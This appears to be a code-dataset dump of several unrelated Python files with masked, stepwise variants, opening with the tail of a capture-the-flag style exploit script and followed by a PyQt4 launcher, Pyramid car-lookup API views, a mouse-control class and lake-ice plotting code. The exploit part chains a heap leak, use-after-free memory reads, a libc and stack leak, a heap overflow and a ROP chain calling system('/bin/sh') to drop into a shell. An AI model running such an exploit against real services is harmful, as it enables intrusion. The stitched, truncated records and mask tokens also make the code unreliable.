really good way of knowing when the shell has opened on the other side...\n # Should maybe put some more functionality into the inline python code instead.\n\n # Save current TTY settings\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n\n # Put TTY into raw mode\n tty.setraw(sys.stdin)\n\n # Resize remote terminal\n # Nice-to-have: also handle terminal resize\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n') # terminal echo\n recvtil('READY\\r\\n') # command output\n\n interact()\n\n # Restore previous settings\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)\n\n#\n# Convenience wrappers that use the global socket instance\n#\ndef send(b):\n c.send(b)\n\ndef sendline(l):\n c.sendline(l)\n\ndef sendnum(n):\n c.sendnum(n)\n\ndef recv(n):\n return c.recv(n)\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\ndef recvn(n):\n return c.recvn(n)\n\ndef recvline():\n return c.recvline()\n\ndef recvregex(r):\n return c.recvregex(r)\n\ndef interact():\n c.interact()\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Global Setup\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ns = socket.create_connection(TARGET)\n#s.settimeout(2)\nc = Channel(s, NETDEBUG)\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Your code here\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nALPHABET = 'abcdefghijklmnopqrstuvwxyz'\n\ndef evl(code):\n sendline(code)\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\ndef readstrvar(name):\n return readvar(name)[1:-1]\n\ndef heapleak():\n \"\"\"Free the lhs and rhs values during add_assign. ...\"\"\"\n for i in range(16):\n evl('{}'.format(i))\n\n # Trigger heap info leak\n evl('h=0+0')\n return readintvar('h') & 0xfffffffffffff000\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\ndef leak(addr, length):\n \"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 0xb0\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"') # will be at offset 0xb0 from heap start\n\n for i in range(15):\n evl('{}'.format(i))\n # 19 slots filled\n\n # allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value\n # Then the output value is allocated into the same slot. Since the output value is String (type of x),\n # lhs is turned into a string with controlled pointer\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\ndef leak2(addr, length):\n \"\"\"Same as above, but different offsets...\"\"\"\n fake_str_addr = heap_base + 0x170\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"') # will be at offset 0xb0 from heap start\n\n for i in range(12):\n evl('{}'.format(i))\n\n evl('a={}+x'.format(fake_str_addr))\n return readstrvar('a')[0:length]\n\n\ndef pwn():\n global heap_base\n\n recvtil('>')\n\n evl('x=\"XXXXXXXXXXXXXXXX\"') # Workaround, need global object or else GC will crash\n # 2 slots always filled from now on (global object and int value 1337)\n\n heap_base = heapleak()\n # 3 slots always filled from now on\n\n print_good(\"Heap base @ 0x{:x}\".format(heap_base))\n\n # Create a smallbin chunk so we can leak a libc pointer\n evl('\"{}\"'.format('A' * 0x100))\n gc(20 - 4)\n\n\n # Leak freelist pointers pointing into the libc\n heap_mem = leak(heap_base, 0x1000)\n for i in range(0, len(heap_mem)-16, 8):\n # Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk\n flink = u64(heap_mem[i:i+8])\n blink = u64(heap_mem[i+8:i+16])\n if (abs(flink - heap_base) > 0x10000 and\n flink > 0x7f0000000000 and\n flink < 0x800000000000 and\n blink > 0x7f0000000000 and\n blink < 0x800000000000):\n break\n else:\n print_bad(\"No freelist pointers found :(\")\n return\n\n libc = flink - 0x3c1928\n print_good(\"libc @ 0x{:x}\".format(libc))\n\n\n # Leak stack pointer by reading environ pointer in libc\n env_ptr = u64(leak2(libc + 0x3c44a0, 8))\n print_good(\"stack @ 0x{:x}\".format(env_ptr))\n\n\n # Calculate addresses\n system = libc + 0x46590\n bin_sh = libc + 0x180103\n pop_rdi = libc + 0x22b9a\n pop_rsi = libc + 0x24885\n pop_rdx = libc + 0x1b8e\n add_rsp_0x48 = libc + 0xf5b8b\n\n print_good(\"/bin/sh @ 0x{:x}\".format(bin_sh))\n\n input_buf = env_ptr - 0x328\n print_good(\"input_buf @ 0x{:x}\".format(input_buf))\n ret_addr = env_ptr - 0x328 - 8\n print_good(\"return address @ 0x{:x}\".format(ret_addr))\n\n\n # 5 slots always filled from now\n\n #\n # Heap spray with Property instances to get a controlled heap layout again\n #\n # Make some objects\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n\n # Trigger GC\n for i in range(9):\n evl('\"{}\"'.format('A' * 0x10))\n evl('1337')\n\n # 10 slots used\n\n # Allocate lots of properties (but no values)\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n\n\n # Set up heap layout for unbounded heap overflow. We need the following layout:\n # | chunk to overflow from | ... | Property to corrupt | ... | Fake string |\n # We overflow into \"Fake string\" to set it's size to 0 and avoid a segfault.\n for i in range(6):\n evl('1337')\n\n # Create some properties\n for i in 'ghijk':\n evl('{}=x'.format(i))\n\n # Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow\n fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0\n evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)\n payload += b'\\x00' * (0x180 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n\n fake_str_addr = heap_base + 0x1e80\n # Trigger the overflow\n evl('p=o+{}'.format(fake_str_addr))\n\n\n # Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address\n payload = b'A' * 0x100\n payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good(\"binary @ 0x{:x}\".format(binary))\n\n offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)\n print_good(\"offset to return address: 0x{:x}\".format(offset_to_ret))\n\n # Some unfortunate restrictions...\n if offset_to_ret > 0x28 or offset_to_ret < 0:\n print_bad(\"Bad offset\")\n return\n\n prop_name = p64(binary + 0xAC9)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad(\"Bad propery name: {}\".format(prop_name))\n return\n\n prop_name = chr(prop_name)\n print_good(\"property name: {}\".format(prop_name))\n\n # Write ROP chain into stack\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n\n # Trigger corruption of InputBuffer.ptr to point further down in the stack\n evl('{}=42'.format(prop_name))\n\n # Next input will be written into the stack frame of readline(). Overwrite the return address with \"add rsp, 0x48 ; ret\"\n payload = b'A'*offset_to_ret\n payload += p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n\n # Wait a short while and drop into interactive mode == shell\n time.sleep(0.5)\n\n interact()\n\nif __name__ == '__main__':\n pwn()\n",
"step-ids": [
30,
44,
58,
59,
63
]
}
|
[
30,
44,
58,
59,
63
] |
#!python
# -*- coding: utf-8 -*-
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from window.window import *
import sys
app = QtGui.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_())
|
normal
|
{
"blob_id": "9e2af13a15a98702981e9ee369c3a132f61eac86",
"index": 5174,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwindow.show()\nsys.exit(app.exec_())\n",
"step-3": "<mask token>\napp = QtGui.QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\nsys.exit(app.exec_())\n",
"step-4": "from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom window.window import *\nimport sys\napp = QtGui.QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\nsys.exit(app.exec_())\n",
"step-5": "#!python\n# -*- coding: utf-8 -*-\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nfrom window.window import *\nimport sys\n\n\napp = QtGui.QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\nsys.exit(app.exec_())",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pyramid.request import Request
from pyramid.response import Response
from pyramid.view import view_config
from svc1_first_auto_service.data.repository import Repository
@view_config(route_name='autos_api',
request_method='GET',
renderer='json')
def all_autos(_):
cars = Repository.all_cars(limit=25)
return cars
@view_config(route_name='auto_api',
request_method='GET',
renderer='json')
def single_auto(request: Request):
car_id = request.matchdict.get('car_id')
car = Repository.car_by_id(car_id)
if not car:
msg = "The car with id '{}' was not found.".format(car_id)
return Response(status=404, json_body={'error': msg})
return car
@view_config(route_name='auto',
request_method='GET',
renderer='json')
def auto_by_id(request: Request):
cid = request.matchdict.get('cid')
cid = int(cid)
if cid is not None:
car = Repository.car_by_cid(cid)
if not car:
msg = f"The car with id '{cid}' was not found."
return Response(status=404, json_body={'error': msg})
return car
else:
msg = f"The cid is None"
return Response(status=404, json_body={'error': msg})
|
normal
|
{
"blob_id": "cb903f3f7fd3c4f3ba5f8ff2ce12aac9c680aa15",
"index": 6116,
"step-1": "<mask token>\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@view_config(route_name='autos_api', request_method='GET', renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@view_config(route_name='autos_api', request_method='GET', renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n@view_config(route_name='auto', request_method='GET', renderer='json')\ndef auto_by_id(request: Request):\n cid = request.matchdict.get('cid')\n cid = int(cid)\n if cid is not None:\n car = Repository.car_by_cid(cid)\n if not car:\n msg = f\"The car with id '{cid}' was not found.\"\n return Response(status=404, json_body={'error': msg})\n return car\n else:\n msg = f'The cid is None'\n return Response(status=404, json_body={'error': msg})\n",
"step-4": "from pyramid.request import Request\nfrom pyramid.response import Response\nfrom pyramid.view import view_config\nfrom svc1_first_auto_service.data.repository import Repository\n\n\n@view_config(route_name='autos_api', request_method='GET', renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n@view_config(route_name='auto', request_method='GET', renderer='json')\ndef auto_by_id(request: Request):\n cid = request.matchdict.get('cid')\n cid = int(cid)\n if cid is not None:\n car = Repository.car_by_cid(cid)\n if not car:\n msg = f\"The car with id '{cid}' was not found.\"\n return Response(status=404, json_body={'error': msg})\n return car\n else:\n msg = f'The cid is None'\n return Response(status=404, json_body={'error': msg})\n",
"step-5": "from pyramid.request import Request\nfrom pyramid.response import Response\nfrom pyramid.view import view_config\n\nfrom svc1_first_auto_service.data.repository import Repository\n\n\n@view_config(route_name='autos_api',\n request_method='GET',\n renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api',\n request_method='GET',\n renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n\n return car\n\n\n@view_config(route_name='auto',\n request_method='GET',\n renderer='json')\ndef auto_by_id(request: Request):\n cid = request.matchdict.get('cid')\n cid = int(cid)\n\n if cid is not None:\n car = Repository.car_by_cid(cid)\n if not car:\n msg = f\"The car with id '{cid}' was not found.\"\n return Response(status=404, json_body={'error': msg})\n\n return car\n else:\n msg = f\"The cid is None\"\n return Response(status=404, json_body={'error': msg})\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class base_controller:
<|reserved_special_token_0|>
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class base_controller:
<|reserved_special_token_0|>
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
def scroll(self, marks: list):
"""
滚动
"""
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy: list, ones=True):
"""
长按
"""
if ones:
m.press(xy[0] * w, xy[1] * h)
else:
m.drag(xy[0] * w, xy[1] * h)
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
m = PyMouse()
w, h = m.screen_size()
class base_controller:
def __init__(self):
pass
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
def scroll(self, marks: list):
"""
滚动
"""
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy: list, ones=True):
"""
长按
"""
if ones:
m.press(xy[0] * w, xy[1] * h)
else:
m.drag(xy[0] * w, xy[1] * h)
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
from pymouse import PyMouse
m = PyMouse()
w, h = m.screen_size()
class base_controller:
def __init__(self):
pass
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
def scroll(self, marks: list):
"""
滚动
"""
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy: list, ones=True):
"""
长按
"""
if ones:
m.press(xy[0] * w, xy[1] * h)
else:
m.drag(xy[0] * w, xy[1] * h)
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
from pymouse import PyMouse
m = PyMouse()
w,h = m.screen_size()
class base_controller:
def __init__(self):
pass
def move(self,xy:list):
'''
移动
'''
m.move(xy[0]*w,xy[1]*h)
def click(self, xy:list):
'''
点击
'''
m.click(xy[0]*w,xy[1]*h)
def scroll(self, marks:list):
'''
滚动
'''
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy:list, ones = True):
'''
长按
'''
if ones:
m.press(xy[0]*w,xy[1]*h)
else:
m.drag(xy[0]*w,xy[1]*h)
def release(self, xy:list):
'''
松开
'''
m.release(xy[0]*w,xy[1]*h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
|
flexible
|
{
"blob_id": "b2f2f1e4b7070ac867b71e538f759e527eb1ffb9",
"index": 416,
"step-1": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n <mask token>\n <mask token>\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-2": "<mask token>\n\n\nclass base_controller:\n <mask token>\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-3": "<mask token>\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-4": "from pymouse import PyMouse\nm = PyMouse()\nw, h = m.screen_size()\n\n\nclass base_controller:\n\n def __init__(self):\n pass\n\n def move(self, xy: list):\n \"\"\"\n 移动\n \"\"\"\n m.move(xy[0] * w, xy[1] * h)\n\n def click(self, xy: list):\n \"\"\"\n 点击\n \"\"\"\n m.click(xy[0] * w, xy[1] * h)\n\n def scroll(self, marks: list):\n \"\"\"\n 滚动\n \"\"\"\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy: list, ones=True):\n \"\"\"\n 长按\n \"\"\"\n if ones:\n m.press(xy[0] * w, xy[1] * h)\n else:\n m.drag(xy[0] * w, xy[1] * h)\n\n def release(self, xy: list):\n \"\"\"\n 松开\n \"\"\"\n m.release(xy[0] * w, xy[1] * h)\n\n\nclass mac_controller(base_controller):\n\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-5": "from pymouse import PyMouse\nm = PyMouse()\nw,h = m.screen_size()\n\nclass base_controller:\n def __init__(self):\n pass\n\n def move(self,xy:list):\n '''\n 移动\n '''\n m.move(xy[0]*w,xy[1]*h)\n \n def click(self, xy:list):\n '''\n 点击\n '''\n m.click(xy[0]*w,xy[1]*h)\n \n def scroll(self, marks:list):\n '''\n 滚动\n '''\n d = marks[0][1] - marks[-1][1]\n R = 0.2\n print(d)\n if d > R:\n m.scroll(-1)\n elif d < -R:\n m.scroll(1)\n\n def press(self, xy:list, ones = True):\n '''\n 长按\n '''\n if ones:\n m.press(xy[0]*w,xy[1]*h)\n else:\n m.drag(xy[0]*w,xy[1]*h)\n\n def release(self, xy:list):\n '''\n 松开\n '''\n m.release(xy[0]*w,xy[1]*h)\n\n\nclass mac_controller(base_controller):\n def __init__(self):\n super(mac_controller, self).__init__()\n",
"step-ids": [
6,
8,
10,
11,
12
]
}
|
[
6,
8,
10,
11,
12
] |
from datetime import datetime
import xarray
import matplotlib.pyplot as plt
import pandas as pd
from matplotlib.dates import date2num
import numpy as np
from matplotlib.gridspec import GridSpec
def test_plot_area_avg(target_nc_folder="", source_nc_path=""):
# target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_1980-2009"
# target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_icefix_Obs_1980-1981_test"
#target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1980-1981_test1"
ice_fr = xarray.open_dataset(source_nc_path)["LC"]
assert isinstance(ice_fr, xarray.DataArray)
ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))
# t, x, y
source_data = ice_fr.to_masked_array(copy=False)
source_time = ice_fr.coords["time"]
source_time = pd.to_datetime(source_time.values.tolist())
s_source = pd.Series(data=[
(field[~field.mask].mean() if not np.all(field.mask) else np.nan) for field in source_data
], index=source_time)
ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + "/*daily.nc")["lake_ice_fraction"]
lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)
lkeff_time = pd.to_datetime(ice_fr_lkeff.coords["t"].values.tolist())
s_lkeff = pd.Series([
(field[~field.mask].mean() if not np.all(field.mask) else np.nan) for field in lkeff_data
], index=lkeff_time)
s_source = s_source[(s_source.index <= lkeff_time[-1]) & (s_source.index >= lkeff_time[0])]
assert isinstance(s_source, pd.Series)
#
print(f"Source: len={len(s_source)}")
print(f"Lkeff: len={len(s_lkeff)}")
# do the plotting
fig = plt.figure()
gs = GridSpec(2, 1)
# plot initial lake fractions
ax = fig.add_subplot(gs[0, 0])
s_source.plot(ax=ax, marker=".", linestyle="None", label="original")
ax.legend()
# plot lake fractions outputed by hles algorithm
ax = fig.add_subplot(gs[1, 0], sharex=ax)
s_lkeff.plot(ax=ax, marker=".", linestyle="None", label="lkeff")
ax.legend()
# plt.show()
def __print_field_stats(tfield, field, label):
good_mask = ~field.mask
if not np.any(good_mask):
print(f"{label}: no meaningful data")
return
good_data = field[good_mask]
print(f"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\n"
f"mean={good_data.mean()}\n"
f"std={good_data.std()}\n")
print("-" * 20)
def test_plot_maps(target_nc_folder, source_nc_path=""):
# target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_1980-2009"
# target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1980-1981_test1"
ice_fr = xarray.open_dataset(source_nc_path)["LC"]
assert isinstance(ice_fr, xarray.DataArray)
ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))
start_date = datetime(1981, 1, 1)
# t, x, y
source_data = ice_fr.to_masked_array(copy=False)
source_time = ice_fr.coords["time"]
source_time = pd.to_datetime(source_time.values.tolist())
ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + "/*daily.nc")["lake_ice_fraction"]
lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)
lkeff_time = pd.to_datetime(ice_fr_lkeff.coords["t"].values.tolist())
# select from lkeff data
lkeff_time_sel = []
lkeff_data_sel = []
for t, afield in zip(lkeff_time, lkeff_data):
if t < start_date:
continue
lkeff_time_sel.append(t)
lkeff_data_sel.append(afield)
lkeff_time = lkeff_time_sel
lkeff_data = lkeff_data_sel
# Select from the source time and data
source_data_sel = []
source_time_sel = []
for t, afield in zip(source_time, source_data):
if lkeff_time[0] <= t <= lkeff_time[-1]:
source_data_sel.append(afield)
source_time_sel.append(t)
gs = GridSpec(1, 2)
for i in range(len(source_time_sel)):
ts = source_time_sel[i]
tl = lkeff_time[i]
data_s = source_data_sel[i]
data_l = lkeff_data[i]
fig = plt.figure(figsize=(20, 10))
ax = fig.add_subplot(gs[0, 0])
ax.set_title(f"Source if: {ts}")
cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))
plt.colorbar(cs, ax=ax)
ax = fig.add_subplot(gs[0, 1])
ax.set_title(f"Lkeff if: {tl}")
cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))
plt.colorbar(cs, ax=ax)
print("*" * 20)
__print_field_stats(ts, data_s, "source")
__print_field_stats(tl, data_l, "lkeff")
print("*" * 20)
ms = data_s[~data_s.mask].mean()
ml = data_l[~data_l.mask].mean()
if ms != ml:
print(f"ms={ms}; ml={ml}")
plt.show()
plt.close(fig)
def main():
target_nc_folder = "/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981"
# source_nc_path = "/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260/cis_nic_glerl_interpolated_lc.nc"
source_nc_path = "/HOME/huziy/skynet3_rech1/obs_data_for_HLES/interploated_to_the_same_grid/GL_0.1_452x260_icefix/cis_nic_glerl_interpolated_lc_fix.nc"
test_plot_area_avg(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)
# test_plot_maps(target_nc_folder=target_nc_folder, source_nc_path=source_nc_path)
plt.show()
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "2d5e147b081283047cd044746d73d91ee2e59052",
"index": 4139,
"step-1": "<mask token>\n\n\ndef __print_field_stats(tfield, field, label):\n good_mask = ~field.mask\n if not np.any(good_mask):\n print(f'{label}: no meaningful data')\n return\n good_data = field[good_mask]\n print(\n f\"\"\"{label} {tfield}:\n{good_data.min()}...{good_data.max()}\nmean={good_data.mean()}\nstd={good_data.std()}\n\"\"\"\n )\n print('-' * 20)\n\n\ndef test_plot_maps(target_nc_folder, source_nc_path=''):\n ice_fr = xarray.open_dataset(source_nc_path)['LC']\n assert isinstance(ice_fr, xarray.DataArray)\n ice_fr = ice_fr.where((ice_fr >= 0) & (ice_fr <= 1))\n start_date = datetime(1981, 1, 1)\n source_data = ice_fr.to_masked_array(copy=False)\n source_time = ice_fr.coords['time']\n source_time = pd.to_datetime(source_time.values.tolist())\n ice_fr_lkeff = xarray.open_mfdataset(target_nc_folder + '/*daily.nc')[\n 'lake_ice_fraction']\n lkeff_data = ice_fr_lkeff.to_masked_array(copy=False)\n lkeff_time = pd.to_datetime(ice_fr_lkeff.coords['t'].values.tolist())\n lkeff_time_sel = []\n lkeff_data_sel = []\n for t, afield in zip(lkeff_time, lkeff_data):\n if t < start_date:\n continue\n lkeff_time_sel.append(t)\n lkeff_data_sel.append(afield)\n lkeff_time = lkeff_time_sel\n lkeff_data = lkeff_data_sel\n source_data_sel = []\n source_time_sel = []\n for t, afield in zip(source_time, source_data):\n if lkeff_time[0] <= t <= lkeff_time[-1]:\n source_data_sel.append(afield)\n source_time_sel.append(t)\n gs = GridSpec(1, 2)\n for i in range(len(source_time_sel)):\n ts = source_time_sel[i]\n tl = lkeff_time[i]\n data_s = source_data_sel[i]\n data_l = lkeff_data[i]\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(gs[0, 0])\n ax.set_title(f'Source if: {ts}')\n cs = ax.contourf(data_s, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n ax = fig.add_subplot(gs[0, 1])\n ax.set_title(f'Lkeff if: {tl}')\n cs = ax.contourf(data_l, np.arange(0, 1.1, 0.1))\n plt.colorbar(cs, ax=ax)\n print('*' * 20)\n __print_field_stats(ts, data_s, 'source')\n __print_field_stats(tl, data_l, 'lkeff')\n print('*' * 20)\n ms = data_s[~data_s.mask].mean()\n ml = data_l[~data_l.mask].mean()\n if ms != ml:\n print(f'ms={ms}; ml={ml}')\n plt.show()\n plt.close(fig)\n\n\ndef main():\n target_nc_folder = (\n '/HOME/huziy/skynet3_rech1/Netbeans Projects/Python/RPN/lake_effect_analysis_daily_Obs_monthly_icefix_test2_1proc_1980-1981'\n )\n source_nc_path = (\n 